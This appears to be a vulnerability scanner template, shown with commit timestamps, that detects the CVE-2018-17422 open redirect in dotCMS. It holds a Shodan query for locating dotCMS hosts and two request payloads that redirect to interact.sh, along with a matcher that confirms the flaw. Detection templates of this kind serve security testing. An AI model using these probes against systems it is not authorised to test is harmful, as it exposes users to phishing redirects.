2022-05-17 07:45:41 +00:00
id : CVE-2018-17422
info :
name : dotCMS < 5.0.2 - Open Redirect
author : 0x_Akoko,daffainfo
severity : medium
2022-05-17 07:54:44 +00:00
description : |
dotCMS before 5.0.2 has open redirects via the html/common/forward_js.jsp FORWARD_URL parameter or the html/portlet/ext/common/page_preview_popup.jsp hostname parameter.
2022-05-17 07:45:41 +00:00
reference :
- https://github.com/dotCMS/core/issues/15286
- https://www.cvedetails.com/cve/CVE-2018-17422
classification :
2022-05-17 20:46:49 +00:00
cvss-metrics : CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
2022-05-17 07:45:41 +00:00
cvss-score : 6.1
cve-id : CVE-2018-17422
cwe-id : CWE-601
metadata :
shodan-query : http.title:"dotCMS"
2022-05-17 20:46:49 +00:00
verified : "true"
2022-05-17 07:45:41 +00:00
tags : cve,cve2018,redirect,dotcms
requests :
- method : GET
path :
2022-06-06 10:40:15 +00:00
- '{{BaseURL}}/html/common/forward_js.jsp?FORWARD_URL=http://www.interact.sh'
- '{{BaseURL}}/html/portlet/ext/common/page_preview_popup.jsp?hostname=interact.sh'
2022-05-17 07:45:41 +00:00
stop-at-first-match : true
matchers-condition : and
matchers :
- type : word
part : body
words :
2022-06-06 10:40:15 +00:00
- "self.location = 'http://www.interact.sh'"
2022-05-17 07:54:20 +00:00
- type : status
status :
- 200